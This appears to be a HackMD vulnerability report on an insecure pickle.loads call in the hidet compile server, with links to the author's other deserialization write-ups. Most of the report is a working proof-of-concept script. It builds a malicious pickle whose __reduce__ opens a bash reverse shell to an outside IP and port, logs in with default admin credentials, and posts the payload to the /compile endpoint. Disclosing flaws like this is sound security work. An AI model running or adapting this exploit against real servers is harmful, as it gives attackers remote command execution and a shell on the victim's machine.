Try   HackMD

hidet - pickle.loads

Describe the bug

In apps/compile server/resources/compilation. Py 126 lines, after get complie server validation, the risk of python deserialization attack can achieve command execution, etc.

Additional context

import pickle
import base64
import requests
import json

class System(object):
    """Create os.system command"""
    def __reduce__(self):
        import os
        return (os.system,('bash -c "bash -i >& /dev/tcp/100.92.79.102/8899 0>&1"',))

code = System()

data1  =  pickle.dumps(code)

print(base64.b64encode(data1))

# default username and password
auth_data = """{
  "username": "admin",
  "password": "admin_password"
}"""

auth_header = {
    "content-type": "application/json"
}

auth_url = "http://100.92.79.102:3281/auth"

auth_res = requests.post(auth_url, data=auth_data, headers=auth_header)

print(auth_res.text)

token = json.loads(auth_res.text)

headers = {
    "authorization":"Bearer " + token["access_token"]
}

res = requests.post('http://100.92.79.102:3281/compile',headers=headers, data=data1)
print(res.text)

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Last changed by 
fe1w0
0
146

Read more

(Not Accepted)

Vulnerability Details - Potential Command Execution via Deserialization Exploit Chain in Specific Component Combinations

Mar 21, 2024
Vulnerability Details - Clojure Command Injection by Deserialization

Under org.clojure:clojure == 1.12.0-alpha5, there exists a denial of service attack initiated through deserialization. By constructing appropriate objects, continuous hashcode calculations can be initiated.

Jan 25, 2024
Vulnerability Details - Clojure Dos by Deserialization

Translation:

Jan 17, 2024
Read more from fe1w0
Published on HackMD